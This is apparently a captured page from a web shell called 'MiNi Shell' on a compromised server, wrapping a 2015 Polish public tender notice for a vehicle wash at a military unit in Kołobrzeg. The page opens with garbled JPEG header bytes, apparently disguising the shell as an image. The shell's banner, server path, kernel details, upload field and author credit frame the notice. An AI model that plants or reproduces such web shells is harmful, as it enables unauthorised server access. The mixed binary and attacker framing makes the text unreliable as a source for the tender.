JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150414/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150414/84042-N-2015.html

<p class="kh_header"><b>Szczecin: Roboty budowlane obejmujące budowę myjni pojazdów wraz z zagospodarowaniem terenu i przyłączami na terenie Jednostki Wojskowej 2117 w Kołobrzegu przy ul. Koszalińskiej 76 oraz uzyskanie decyzji o pozwoleniu na użytkowanie zgodnie z decyzją o pozwoleniu na budowę i Ustawą Prawo Budowlane (PKOB 1230).</b><br>
<b>Numer ogłoszenia: 84042 - 2015; data zamieszczenia: 14.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Rejonowy Zarząd Infrastruktury , ul. Narutowicza 17B, 70-240 Szczecin, woj. zachodniopomorskie, tel. 261 452026, 261 452000, faks 261 452024, 261 452029.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.rziszczecin.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Organizacyjna MON.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Roboty budowlane obejmujące budowę myjni pojazdów wraz z zagospodarowaniem terenu i przyłączami na terenie Jednostki Wojskowej 2117 w Kołobrzegu przy ul. Koszalińskiej 76 oraz uzyskanie decyzji o pozwoleniu na użytkowanie zgodnie z decyzją o pozwoleniu na budowę i Ustawą Prawo Budowlane (PKOB 1230)..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót budowlanych obejmujących budowę myjni pojazdów wraz z zagospodarowaniem terenu i przyłączami na terenie Jednostki Wojskowej 2117 w Kołobrzegu przy ul. Koszalińskiej 76 oraz uzyskanie decyzji o pozwoleniu na użytkowanie zgodnie z decyzją o pozwoleniu na budowę i Ustawą Prawo Budowlane (PKOB 1230).

Zamówienie wiąże się z dostępem do informacji niejawnych na poziomie ZASTRZEŻONE.

                Przedmiot zamówienia w szczególności polega na wykonaniu:

a)	robót ogólnobudowlanych w tym: robót przygotowawczych i rozbiórkowych (rozbiórka budynku technicznego nr 46, demontaż zbiornika stalowego na wodę czystą o pojemności 74,0 m3, rozbiórka kanałów ściekowych wody brudnej, rozbiórka studzienek betonowych z włazami żeliwnymi, rozbiórka zbiornika żelbetowego 3-komorowego), robót ziemnych, fundamentów, kanałów ściekowych i ramp najazdowych, odwodnieniu wykopu, ścian, posadzek, izolacji, stropów, konstrukcji stalowych, balustrad, pokrycia dachu, stolarki okiennej i drzwiowej, bram, świetlików dachowych, elementów kowalsko ślusarskich, elewacji, wyposażenia części socjalnej, elementów zewnętrznych (odbojów, murków oporowych, posadzki, balustrad),
b)	robót sanitarnych w tym: sieci zewnętrznych (instalacji kanalizacji deszczowej, kanalizacji sanitarnej, instalacji zewnętrznej wodociągowej, ciepłowniczej) wraz z przyłączami, instalacji sanitarnych wewnętrznych (wodociągowej, centralnego ogrzewania, ciepła technologicznego, kanalizacyjnej, wentylacji mechanicznej), instalacji solarnej, wyposażenia technologicznego myjni (dostawy i montażu), kotłowni, 
c)	robót elektrycznych w tym: instalacji elektrycznych zewnętrznych (kolizji elektroenergetycznych, zasilania kablowego nn), instalacji elektrycznych wewnętrznych (rozdzielnic, wewnętrznych linii zasilających, instalacji oświetleniowej, instalacji gniazd wtyczkowych, instalacji siłowej i odbiorów technologicznych, instalacji odgromowej, ekwipotencjalizacji, pomiarów,
d)	robót teletechnicznych w tym: instalacji telefonicznej,
e)	robót geodezyjnych (celem wykonania między innymi: wytyczenia tras sieci i przyłączy, wykonania inwentaryzacji powykonawczej oraz aktualizacji mapy zasadniczej w Ośrodku Dokumentacji Budownictwa Wojskowego Rejonowym Zarządzie Infrastruktury Szczecin).

1)	Po stronie Wykonawcy jest uzyskanie w imieniu Użytkownika (na podstawie wystawionego upoważnienia) decyzji WDT zezwalających na eksploatację urządzeń podlegających dozorowi technicznemu. Rodzaje urządzeń podlegających dozorowi technicznemu określa Rozporządzenie Rady Ministrów z dnia 7 grudnia 2012 r. w sprawie rodzajów urządzeń technicznych podlegających dozorowi technicznemu (DZ.U.2012 nr 0 poz. 1468 ) wydane na podstawie art. 5 ust. 2 Ustawy o dozorze technicznym.

2)	Po stronie Wykonawcy jest przeprowadzanie przeglądów układu technologicznego myjni w okresie gwarancji. Wykonawca robót zobowiązany jest do wyposażenia myjni w środki myjące  na okres trzech miesięcy od daty odbioru końcowego.

3)	Wykonawca robót wykona dokumentację techniczną powykonawczą, wykona świadectwo charakterystyki energetycznej budynku oraz w okresie gwarancyjnym po odbiorze końcowym robót budowlanych w pierwszym sezonie grzewczym przeprowadzi badanie kamerą termowizyjną w celu sprawdzenia poprawności zaizolowania całego budynku i sprawdzi czy nie występują mostki termiczne na wykonanym dociepleniu obiektu  zgodnie z Ustawą Prawo Budowlane z dnia 07.07.1994 r. z późniejszymi zmianami (t. j.. Dz. U. z 2013 r., poz. 1409 z późn. zm.); ( Dz. U. nr 201, poz. 1240 Rozporządzenie Ministra Infrastruktury z dnia 06.11.2008r. w sprawie metodologii obliczania charakterystyki energetycznej budynku stanowiącej samodzielną całość techniczno-użytkowa oraz sposobu sporządzania i wzorów świadectw ich  charakterystyki energetycznej), oraz przekaże dla Zamawiającego zgodnie z zapisami Ustawy Prawo Budowlane z dnia 07.07.1994 r. z późniejszymi zmianami materiały wymienione w art. 60 - dokumentację budowy i dokumentację powykonawczą. Przekazaniu podlegają również decyzje dotyczące obiektu, a także instrukcje obsługi i eksploatacji: obiektu, instalacji i urządzeń związanych z tym obiektem. 

4)	Po stronie Wykonawcy jest wykonanie na swój koszt utylizacji odpadów powstałych w wyniku robót budowlanych zgodnie z Ustawą o odpadach z dnia 14.12.2012 r. (Dz. U.  z 2013 r., poz. 21 (Wykonawca jest wytwórcą odpadów budowlanych), a pozostałe materiały np. z rozbiórki nie podlegające utylizacji zgodnie z w/w Ustawą Zamawiający pozostawia do dyspozycji Wykonawcy.

5)	Wykonawca przed przystąpieniem do robót budowlanych wykona inwentaryzację fotograficzną terenu budowy i przebudowywanych obiektów budowlanych, oraz po  zakończeniu robót, wykona dokumentację powykonawczą fotograficzną  (fotografując  zagospodarowanie terenu, obiekty budowlane po przebudowie, po wybudowaniu, z tego samego ujęcia w celu porównania).

6)	Wszystkie roboty mają być wykonane zgodnie z obowiązującymi przepisami i normami..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.00.00-1, 45.30.00.00-0, 45.23.13.00-8, 45.31.12.00-2, 45.23.31.40-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 480.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości 110 000,00 PLN (art. 45, 46).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>przewiduje się udzielenie zaliczek na poczet wykonania zamówienia</b></li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają uprawnienia do wykonywania określonej działalności lub czynności w zakresie pozwalającym na realizację zamówienia, tj. posiadają opracowaną zgodnie z art. 43 ust. 5 Ustawy z dnia 5 sierpnia 2010 r. o ochronie informacji niejawnych (Dz.U. z 2010 r. Nr 182, poz 1228), instrukcję dotyczącą sposobu i trybu przetwarzania informacji niejawnych o klauzuli ZASTRZEŻONE oraz określającą zakres i warunki stosowania środków bezpieczeństwa fizycznego w celu ich ochrony.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnieniem warunku będzie wykonanie w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 robót budowlanych polegających na remoncie lub budowie lub przebudowie obiektu kubaturowego budownictwa przemysłowego lub budynku garażowo-warsztatowego lub stacji diagnostycznej lub myjni pojazdów o łącznej wartości minimum 2 500 000,00 zł brutto.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnieniem warunku będzie dysponowanie odpowiednim potencjałem technicznym.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnieniem warunku będzie dysponowanie odpowiednim potencjałem technicznym oraz odpowiednimi osobami zdolnymi do wykonania zamówienia, tj.:

a)	 osobami, które będą uczestniczyć w wykonywaniu zamówienia i posiadają uprawnienia budowlane upoważniające do kierowania robotami budowlanymi w specjalności:
-	konstrukcyjno - budowlanej- minimum 1 osoba,
-	instalacyjnej w zakresie sieci, instalacji i urządzen cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych - minimum 1 osoba,
-	instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych - minimum 1 osoba
-	drogowej - minimum 1 osoba,
-	telekomunikacyjnej - minimum 1 osoba,

b)	osobami, które będą uczestniczyć w wykonywaniu zamówienia i posiadają uprawnienia:
- 	geodezyjne w zakresie geodezyjnych pomiarów sytuacyjno - wysokościowych, realizacyjnych i inwentaryzacyjnych - minimum 1 osoba.
c)	osobami odpowiedzialnymi za ochronę informacji niejawnych, tj.: 
- 	pełnomocnikiem ds. ochrony informacji niejawnych,
- 	osobą odpowiedzialną za ewidencjonowanie materiałów i dokumentów niejawnych oznaczonych klauzulą ZASTRZEŻONE.

W przypadku, gdy Wykonawca nie dysponuje wszystkimi wymaganymi pracownikami, o których mowa w pkt a) i b), to może zaangażować pracowników spoza firmy ale pod warunkiem, że posiadają wszystkie wymagane uprawnienia, a ponadto na czas realizacji zadania musi ich związać z firmą umowami.

Wszyscy ww. pracownicy oraz kierownik firmy, muszą posiadać ważne dokumenty upoważniające do dostępu do materiałów niejawnych o klauzuli co najmniej ZASTRZEZONE (poświadczenia bezpieczeństwa lub pisemne upoważnienia wydane przez kierownika jednostki organizacyjnej) oraz zaświadczenia stwierdzające odbycie szkolenia w zakresie ochrony informacji niejawnych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Wykaz parametrów cenotwórczych: robocizny, kosztów pośrednich, zysku, kosztu zakupu materiałów.
2)	Wypełniony harmonogram rzeczowo - finansowy z wypełnioną kolumną nr 3 i 4 oraz czasookresem realizacji  przedstawionym liniowo.
3)	Oświadczenie o posiadaniu opracowanej zgodnie z art. 43 ust. 5 Ustawy z dnia 5 sierpnia 2010 r. o ochronie informacji niejawnych (Dz.U. z 2010 r. Nr 182, poz 1228), instrukcji dotyczącej sposobu i trybu przetwarzania informacji niejawnych o klauzuli ZASTRZEŻONE oraz określającą zakres i warunki stosowania środków bezpieczeństwa fizycznego w celu ich ochrony.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin realizacji - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana umowy może nastąpić w przypadku:

a)	poprawy jakości lub innych parametrów charakterystycznych dla objętego proponowaną zmianą elementu robót budowlanych lub zmiany technologii na korzystniejszą, nowocześniejszą, tańszą niż określona w SIWZ,
b)	aktualizacji rozwiązań projektowych z uwagi na postęp technologiczny lub zmianę obowiązujących przepisów,
c)	wprowadzenia do dokumentacji projektowej zmian, o których mowa w art. 36a ust. 5 ustawy z dnia 7 lipca 1994 r. - Prawo budowlane (tekst jedn. Dz.U. z 2006 r. nr 156, poz. 1118 ze zm.) wymagających zgody projektanta,
d)	zmiany wymiarów, położenia lub wysokości elementów związanych z robotą budowlaną, 
e)	zmiany w kolejności i terminach wykonywania robót budowlanych niemożliwych do przewidzenia w chwili zawierania umowy,
f)	uzasadnione zmiany ilości robót budowlanych do określonych w dokumentacji i w opisie przedmiotu zamówienia i związana z powyższym zmiana wynagrodzenia,
g)	konieczności zmiany terminu wykonania przedmiotu umowy w przypadku:
- konieczności wykonania zamówień dodatkowych w rozumieniu art. 67 ust. 1 pkt 5 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych, (t.j. Dz.U. z 2013 r., poz. 907 z późn. zm.), warunkujących wykonanie przedmiotu zamówienia,
- wstrzymania wykonania całości lub części robót na skutek wystąpienia okoliczności niezależnych od wykonawcy, 
Uwaga: powyższe będzie możliwe pod warunkiem potwierdzenia przez inspektora nadzoru w dokumentacji budowy wystąpienia okoliczności uzasadniających zmianę terminu,
h)	uzasadnionej rezygnacji z wykonania części robót budowlanych w wyniku zmian wprowadzonych do dokumentacji projektowej i związana z tym pomniejszenie wynagrodzenia obliczonego zgodnie z wskaźnikami cenotwórczymi określonymi w ofercie, średnimi cenami SEKOCENBUD dla kwartału aktualnego w dniu składania oferty, a w przypadku braku danych zgodnie z cenami rynkowymi aktualnymi w tym okresie,
i)	zmiany kierownika budowy lub kierowników robót. Warunkiem zmiany będzie posiadanie przez te osoby uprawnień, takich jak wskazane w ofercie,
j)	zmiany podwykonawcy robót wskazanych w ofercie, pod warunkiem uzyskania zgody Zamawiającego na zatrudnienie nowego podwykonawcy,
k)	zmiany dopuszczającej do realizacji części zamówienia podwykonawcy w sytuacji nieprzewidzianej, po wcześniejszym uzgodnieniu z Zamawiającym,
l)	zmiany limitu finansowego w danym roku budżetowym,
m)	zmiany spowodowanej okolicznościami siły wyższej lub powstałej z winy osób trzecich,
n)	zmiany w przepisach ustawowych i aktach wykonawczych związanych z przedmiotem zamówienia, które nastąpiły po dniu zawarcia umowy,
o)	wystąpienia okoliczności, których strony umowy nie były w stanie przewidzieć pomimo zachowania należytej staranności.
p)	zmiany w harmonogramie rzeczowo - finansowym na skutek sytuacji niemożliwej wcześniej do przewidzenia oraz po zaakceptowaniu zmiany przez Zamawiającego,
q)	zmiany terminu złożenia faktury,
r)	zmiany wysokości zaliczki,
s)	zmiana procentowa wartości ostatniej faktury.

W przypadku wystąpienia sytuacji powodujących konieczność wprowadzenia takich zmian, zostaną wprowadzone do umowy aneksem na warunkach uzgodnionych przez strony.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.rziszczecin.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> jak w pkt I.1 niniejszego ogłoszenia..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.05.2015 godzina 10:00, miejsce: siedziba RZI Szczecin (budynek nr 22, biuro nr 4).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Opis kryteriów, ich znaczenie i sposób oceny ofert.

Kryterium: cena	                                znaczenie: 90%	 
Kryterium: termin	                  znaczenie: 10%	 
Maksymalna ilość punktów możliwych do uzyskania przez oferenta: 100 pkt.
Liczba punktów zostanie zaokrąglona do 2 miejsc po przecinku.

Cena brutto ( waga kryterium 90):

Liczba punktów przyznana przez Zamawiającego za kryterium Cena zostanie określona wg wzoru:

                                                                                        
Pc = X/Y x 90
                                                                                        

Pc - obliczone punkty za kryterium cena
X - cena najniższa badanych ofert (zł)
Y - cena oferty badanej (zł)
Maksymalna ilość punktów możliwych do uzyskania przez oferenta: 90 pkt

Czas skrócenia terminu realizacji zamówienia (waga kryterium 10):

Liczba punktów przyznana przez Zamawiającego za kryterium Termin zostanie określona wg wzoru:

                                                                                        
Pt = X/Y x 10
                                                                                        

Pt - obliczone punkty za kryterium termin
X - skrócenie terminu wykonania robót budowlanych zadeklarowana przez oferenta 
                                                                                   (ilość dni - od 1 dnia do 30 dni)
Y - maksymalne skrócenie terminu wykonania przedmiotu zamówienia wynosi 30 dni
Maksymalna ilość punktów możliwych do uzyskania przez oferenta: 10 pkt
Wykonawca, który nie zaoferuje skrócenia terminu wykonania zamówienia otrzyma 0 pkt.

Warunki brzegowe:
-  termin wykonania zamówienia nie może być dłuższy niż 16 miesięcy (480 dni)
-  maksymalne skrócenie terminu wykonania zamówienia wynosi 30 dni.

Dokonując oceny Zamawiający zsumuje punkty w odniesieniu do kryterium ceny i terminu wg następującego wzoru:

Po (Punkty oferty) = Pc (Punkty cena) + Pt (Punkty termin) 

Kryterium ceny przyznano wagę 90% ze względu na fakt, iż ma ona podstawowe znaczenie dla Zamawiającego i wynika z obowiązku racjonalnego i oszczędnego wydatkowania środków publicznych. Kryterium terminu przyznano wagę 10 % mając na uwadze potrzebę przyspieszenia realizacji inwestycji w celu umożliwienia wcześniejszego przekazania jej do użytkowania i realizowania zadań  stawianych jednostce wojskowej.

Zamawiający wybierze ofertę najkorzystniejszą spośród wszystkich niepodlegających odrzuceniu ofert wyłącznie na podstawie kryteriów oceny ofert. Oferta, która spełni wszystkie warunki i wymagania oraz uzyska najwyższą liczbę punktów, obliczoną według powyższych wzorów zostanie uznana przez Zamawiającego za najkorzystniejszą..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com